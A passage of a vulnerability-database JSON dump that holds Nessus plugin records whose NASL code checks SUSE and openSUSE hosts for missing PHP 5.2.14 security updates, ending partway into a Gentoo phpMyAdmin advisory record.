flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-odbc-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-openssl-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-pcntl-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-pdo-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-pear-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-pgsql-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-posix-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-pspell-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-shmop-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-snmp-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-soap-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-sockets-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-sqlite-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-suhosin-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-sysvmsg-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-sysvsem-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-sysvshm-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-tokenizer-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-wddx-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-xmlreader-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-xmlrpc-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-xsl-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-zlib-5.2.14-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:34:10", "description": "PHP was updated to version 5.2.14 to fix several security issues :\n\n- [CVE-2010-1860](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-1860)\n\n- [CVE-2010-1862](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-1862)\n\n- [CVE-2010-1864](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-1864)\n\n- [CVE-2010-1914](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-1914)\n\n- [CVE-2010-1915](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-1915)\n\n- [CVE-2010-1917](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-1917)\n\n- [CVE-2010-2093](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2093)\n\n- [CVE-2010-2094](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2094)\n\n- [CVE-2010-2097](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2097)\n\n- [CVE-2010-2100](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2100)\n\n- [CVE-2010-2101](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2101)\n\n- [CVE-2010-2190](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2190)\n\n- [CVE-2010-2191](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2191)\n\n- [CVE-2010-2225](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2225)\n\n- [CVE-2010-2484](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2484)\n\n- [CVE-2010-2531](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-2531)\n\n- [CVE-2010-3062](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-3062)\n\n- [CVE-2010-3063](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-3063)\n\n- [CVE-2010-3064](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-3064)\n\n- [CVE-2010-3065](http://cve.mitre.org/cgi-bin/cvename.cgi?nam e=CVE-2010-3065)", "cvss3": {}, "published": "2010-10-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0678-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1914", "CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-ldap", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-ncurses", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-zlib", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-dbase", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-hash", "p-cpe:/a:novell:opensuse:php5-iconv"], "id": "SUSE_11_1_APACHE2-MOD_PHP5-100928.NASL", "href": "https://www.tenable.com/plugins/nessus/49752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-3213.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49752);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1860\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0678-1)\");\n script_summary(english:\"Check for the apache2-mod_php5-3213 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP was updated to version 5.2.14 to fix several security issues :\n\n- [CVE-2010-1860](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-1860)\n\n- [CVE-2010-1862](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-1862)\n\n- [CVE-2010-1864](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-1864)\n\n- [CVE-2010-1914](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-1914)\n\n- [CVE-2010-1915](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-1915)\n\n- [CVE-2010-1917](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-1917)\n\n- [CVE-2010-2093](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2093)\n\n- [CVE-2010-2094](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2094)\n\n- [CVE-2010-2097](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2097)\n\n- [CVE-2010-2100](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2100)\n\n- [CVE-2010-2101](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2101)\n\n- [CVE-2010-2190](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2190)\n\n- [CVE-2010-2191](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2191)\n\n- [CVE-2010-2225](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2225)\n\n- [CVE-2010-2484](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2484)\n\n- [CVE-2010-2531](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-2531)\n\n- [CVE-2010-3062](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-3062)\n\n- [CVE-2010-3063](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-3063)\n\n- [CVE-2010-3064](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-3064)\n\n- [CVE-2010-3065](http://cve.mitre.org/cgi-bin/cvename.cgi?nam\ne=CVE-2010-3065)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cgi-bin/cvename.cgi?nam\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=605097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=605100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609766\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=616232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619483\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619489\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=633932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=636923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-09/msg00053.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"apache2-mod_php5-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-bcmath-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-bz2-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-calendar-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ctype-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-curl-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dba-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dbase-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-devel-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dom-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-exif-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-fastcgi-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ftp-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gd-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gettext-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gmp-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-hash-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-iconv-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-imap-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-json-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ldap-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mbstring-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mcrypt-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mysql-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ncurses-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-odbc-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-openssl-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pcntl-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pdo-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pear-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pgsql-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-posix-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pspell-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-readline-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-shmop-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-snmp-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-soap-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sockets-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sqlite-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-suhosin-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvmsg-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvsem-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvshm-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-tidy-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-tokenizer-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-wddx-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlreader-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlrpc-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlwriter-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xsl-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-zip-5.2.14-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-zlib-5.2.14-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T14:39:08", "description": "The remote host is affected by the vulnerability described in GLSA-201201-01 (phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers and phpMyAdmin Security Advisories referenced below for details.\n Impact :\n\n Remote attackers might be able to insert and execute PHP code, include and execute local PHP files, or perform Cross-Site Scripting (XSS) attacks via various vectors.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2012-01-05T00:00:00", "type": "nessus", "title": "GLSA-201201-01 : phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-7251", "CVE-2008-7252", "CVE-2010-2958", "CVE-2010-3055", "CVE-2010-3056", "CVE-2010-3263", "CVE-2011-0986", "CVE-2011-0987", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2643", "CVE-2011-2718", "CVE-2011-2719", "CVE-2011-3646", "CVE-2011-4064", "CVE-2011-4107", "CVE-2011-4634", "CVE-2011-4780", "CVE-2011-4782"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:phpmyadmin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201201-01.NASL", "href": "https://www.tenable.com/plugins/nessus/57433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201201-01.\n#\n# The advisory text is 